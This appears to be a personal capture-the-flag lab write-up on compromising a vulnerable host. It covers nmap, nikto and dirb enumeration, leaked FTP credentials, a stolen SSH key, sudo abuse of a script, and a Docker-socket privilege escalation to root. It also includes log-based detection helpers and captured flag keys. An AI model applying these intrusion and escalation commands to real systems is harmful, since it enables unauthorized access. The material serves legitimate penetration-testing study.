#InvestigationMethodology
To find the target's IP address on the lab network we first get our own address (and so the subnet) from DHCP, then scan the whole /24 for hosts answering on TCP port 80:

```sh
dhclient -v
nmap -sT -p80 -vv 192.168.254.0/24 | grep open
```

`-sT` is a full TCP connect scan and `-p80` limits it to port 80; `grep open` keeps only the lines for ports reported as open. Port 80 is chosen because a web server is the service most likely to be listening on a lab target, not because it is always open: a host with no web server is invisible to this scan, so a ping sweep (`nmap -sn 192.168.254.0/24`) or a wider port range is the fallback.
The scan reports two addresses: 192.168.254.254 (the router) and 192.168.254.166 (the target host). We open the target's address in a web browser.
The result:
![[Pasted image 20240419101809.png]]
So two hosts on the network answer on port 80 (which does not yet make them vulnerable, it only tells us where to look): ---.254 is the router, ---.166 is the PC we are after.
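Rather than grepping nmap's verbose output by eye, the grepable output format (`-oG -`) can be parsed directly. The following is an added example, not part of the original note: a small shell function that lists the hosts with a given TCP port open, fed here with a constructed sample of `-oG` output that mirrors the two hosts found above (the sample is made up for this note; in a real run the scan output is piped in).

```sh
#!/bin/sh
# Constructed sample of nmap grepable (-oG) output for the sweep above.
# Real usage:  nmap -sT -p80 -oG - 192.168.254.0/24 | open_hosts 80
SAMPLE_NMAP_OG='# Nmap 7.94 scan initiated (constructed sample)
Host: 192.168.254.1 ()  Status: Up
Host: 192.168.254.1 ()  Ports: 80/closed/tcp//http///
Host: 192.168.254.166 ()  Status: Up
Host: 192.168.254.166 ()  Ports: 80/open/tcp//http///
Host: 192.168.254.254 ()  Status: Up
Host: 192.168.254.254 ()  Ports: 80/open/tcp//http///
# Nmap done (constructed sample)'

# open_hosts PORT: read -oG output on stdin, print the IP of every host whose
# "Ports:" line reports PORT as open/tcp. The regex anchors the port number to
# the start of a port entry so that "80" does not also match "8080".
open_hosts() {
  port="$1"
  awk -v p="$port" '
    /Ports:/ && $0 ~ ("(Ports: |, )" p "/open/tcp") { print $2 }
  '
}

# Stand-alone demonstration on the constructed sample.
printf '%s\n' "$SAMPLE_NMAP_OG" | open_hosts 80
```

The `Status: Up` lines come from nmap's host discovery and are ignored here; only hosts that actually report the port as open are printed, which is exactly the set worth opening in a browser.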
Next we run `nikto -h <ip address of the host>`. Nikto is a free command-line vulnerability scanner that examines web servers for dangerous files/CGIs, outdated server software and other problems.
![[Pasted image 20240419113519.png]]
Here we see that robots.txt may contain something, so we visit it.
![[Pasted image 20240419113603.png]]
It points to /nothing.
![[Pasted image 20240419113637.png]]
There is nothing there either.
We switch to another enumeration method: brute-forcing directory names with DirBuster.
In DirBuster, enter the target URL including the port (http://192.168.254.166:80), click Browse, and pick a wordlist from the DirBuster share folder:
/usr/share/dirbuster/wordlists
![[Pasted image 20240419114356.png]]
Select the list and click Start. The results look like this: ![[Pasted image 20240419114706.png]]
The GUI gave an error, so we do the same scan on the command line with dirb:

```sh
dirb http://192.168.254.166 /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
dirb http://192.168.254.137:80 /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
```

The second line is the same scan against 192.168.254.137, the other address these notes record; confirm the target's current address with the nmap sweep above before launching it, since a DHCP lease can change between sessions.
![[Pasted image 20240419121116.png]]
Study this again!!

On the server side the brute-force is visible in the Apache access log. Follow it live, or pull the client and the requested path out of a saved copy:

```sh
tail -f /var/log/apache2/access.log
grep GET fichier.txt | awk '{ print $1, $7 }'   # works the same on a .log file
```

The field numbers depend on Apache's LogFormat: in the default combined format `$1` is the client IP and `$7` the request path (`$2` and `$8` would print the ident placeholder `-` and the protocol `HTTP/1.1`).
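The defender's view of the dirb run above is a burst of 404 responses from a single client. As an added example (not from the original note), here are two shell functions over constructed access-log lines: one that extracts the columns the awk one-liner was after, and one that flags clients whose 404 count reaches a threshold. The sample lines are made up for this note and only imitate the default combined log format.

```sh
#!/bin/sh
# Constructed sample of Apache combined-log lines (not captured from the box):
# one client brute-forcing paths, one ordinary visitor.
SAMPLE_ACCESS_LOG='192.168.254.1 - - [19/Apr/2024:12:11:16 +0200] "GET / HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.168.254.1 - - [19/Apr/2024:12:11:17 +0200] "GET /admin HTTP/1.1" 404 276 "-" "Mozilla/5.0"
192.168.254.1 - - [19/Apr/2024:12:11:17 +0200] "GET /backup HTTP/1.1" 404 276 "-" "Mozilla/5.0"
192.168.254.1 - - [19/Apr/2024:12:11:17 +0200] "GET /images HTTP/1.1" 404 276 "-" "Mozilla/5.0"
192.168.254.1 - - [19/Apr/2024:12:11:18 +0200] "GET /hidden_text HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.254.1 - - [19/Apr/2024:12:11:18 +0200] "GET /uploads HTTP/1.1" 404 276 "-" "Mozilla/5.0"
192.168.254.1 - - [19/Apr/2024:12:11:18 +0200] "GET /cgi-bin HTTP/1.1" 404 276 "-" "Mozilla/5.0"
192.168.254.1 - - [19/Apr/2024:12:11:19 +0200] "GET /test HTTP/1.1" 404 276 "-" "Mozilla/5.0"
192.168.254.20 - - [19/Apr/2024:12:12:01 +0200] "GET /robots.txt HTTP/1.1" 200 57 "-" "curl/8.0"
192.168.254.20 - - [19/Apr/2024:12:12:02 +0200] "GET /nope HTTP/1.1" 404 276 "-" "curl/8.0"'

# get_requests: "client path status" for every GET line on stdin.
# In the combined format $1 is the client, $7 the path and $9 the status.
get_requests() {
  grep ' "GET ' | awk '{ print $1, $7, $9 }'
}

# dir_bruteforce_clients [THRESHOLD]: print "client count" for each client with
# at least THRESHOLD (default 5) responses of status 404. Paths that exist
# (200) do not count, so a legitimate visitor is not flagged.
dir_bruteforce_clients() {
  threshold="${1:-5}"
  awk -v t="$threshold" '
    $9 == 404 { n[$1]++ }
    END { for (ip in n) if (n[ip] >= t) print ip, n[ip] }
  '
}

# Stand-alone demonstration on the constructed sample.
printf '%s\n' "$SAMPLE_ACCESS_LOG" | get_requests
printf '%s\n' "$SAMPLE_ACCESS_LOG" | dir_bruteforce_clients 5
```

Because the count is emitted in awk's `END` block, `dir_bruteforce_clients` is meant for batch use (`dir_bruteforce_clients 20 < /var/log/apache2/access.log`), not behind `tail -f`, which never reaches end of file.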
We use the directory brute-force to find hidden URLs on the site.
It finds hidden_text,
so we browse to 192.168.254.166/hidden_text
![[Pasted image 20240419135859.png]]
We check pwned.vuln and see this:
![[Pasted image 20240419140152.png]]
In the page source there are more details:
![[Pasted image 20240419135956.png]]
This password does not work on the login page, but the comment hints at FTP, so we try to connect to the FTP service instead.
In a terminal we connect to the FTP server as ftpuser:
![[Pasted image 20240419140309.png]]
We're in! Not through an exploit: the credentials leaked in the page source simply gave us FTP access.
Inside the FTP share we find an SSH private key at /home/ftpuser/share/id_rsa; we download it (FTP `get`) and use the following line to connect with it:
![[Pasted image 20240419141719.png]]
We then log in as ariana, one of the users on the PC, with that key:

```sh
ssh ariana@192.168.254.166 -i /home/ftpuser/share/id_rsa
```

`-i` takes the path of the downloaded copy of the key on the attacking machine; ssh refuses a key file that other users can read (`chmod 600 id_rsa` first if needed).
We're in as ariana!
![[Pasted image 20240419143832.png]]
![[Pasted image 20240419143959.png]]
![[Pasted image 20240419144057.png]]
Now we run messenger.sh, the route to the selena account.
To execute it: ![[Pasted image 20240419145643.png]]
messenger.sh opens another shell from inside our terminal. The entry for ariana in /etc/sudoers grants `(ALL) NOPASSWD` on that file, so ariana may run it as any user without a password (`sudo -l` lists such entries for the current user). To run messenger.sh as selena:

```sh
sudo -u selena /home/messenger.sh
```
RECAP OF WHAT WE HAVE DONE TO GET ACCESS
FTP as ftpuser (credentials from the page source) --> id_rsa from /home/ftpuser/share --> SSH as ariana --> sudo -u selena /home/messenger.sh --> /bin/bash as selena
Inside selena's bash we upgrade the shell to a proper pty:

```sh
python3 -c 'import pty; pty.spawn("/bin/bash")'
```
![[Pasted image 20240419151511.png]]
> [!NOTE]
> ariana key: fb8d98be1265dd88bac522e1b2182140
> selena key: 711fdfc6caad532815a440f7f295c176
`ps auxf` lists every process on the system as a tree.
We see that the docker daemon is running in the background.
![[Pasted image 20240419155151.png]]
If our user can talk to the Docker daemon, a single docker command gives us root:

```sh
docker run -v /:/mnt --rm -it privesc chroot /mnt /bin/bash
```

`privesc` is the name of a local image (list them with `docker images`). `-v /:/mnt` bind-mounts the host's root filesystem at /mnt inside the container, `--rm -it` gives an interactive container that is removed on exit, and `chroot /mnt /bin/bash` starts a shell whose root directory is the host filesystem. Processes in the container run as root by default, so that shell is root on the host. This only works when the user can write to /var/run/docker.sock (normally by being in the docker group), which is why membership of the docker group is equivalent to root.
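Before trying the escalation it is worth checking the precondition explicitly. The following is an added example (not from the original note): two shell checks for Docker socket access, and a wrapper that only runs the escalation command when the socket is writable. The socket path is a parameter so the check can be exercised on a scratch file; the image name `privesc` is the one from the note and is assumed to exist locally.

```sh
#!/bin/sh
# docker_socket_writable [SOCKET]: true if the current user can write to the
# Docker daemon socket. Write access to the socket is all that is needed to
# start a container that bind-mounts / and is therefore root on the host.
docker_socket_writable() {
  sock="${1:-/var/run/docker.sock}"
  [ -w "$sock" ]
}

# in_docker_group: true if the current user is a member of the docker group,
# which is the usual way socket access is granted.
in_docker_group() {
  id -nG 2>/dev/null | tr ' ' '\n' | grep -qx docker
}

# docker_root_shell [IMAGE]: the escalation from the note, run only when the
# precondition holds. IMAGE defaults to "privesc" (assumed local image; see
# `docker images`). Returns 1 without touching docker if the socket is not ours.
docker_root_shell() {
  image="${1:-privesc}"
  if docker_socket_writable; then
    docker run -v /:/mnt --rm -it "$image" chroot /mnt /bin/bash
  else
    echo "docker socket not writable by $(id -un); this privesc path does not apply" >&2
    return 1
  fi
}

# Stand-alone demonstration: report the situation on this machine.
if in_docker_group; then echo "in docker group"; else echo "not in docker group"; fi
if docker_socket_writable; then echo "docker socket writable"; else echo "docker socket not writable"; fi
```

On the defensive side the same check is the audit: `getent group docker` lists everyone who effectively has root, and the socket should not be world-writable.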
![[Pasted image 20240419155939.png]]
This way I became root.
![[Pasted image 20240419155955.png]]
192.168.254.152:2049 (TCP 2049 is the NFS port)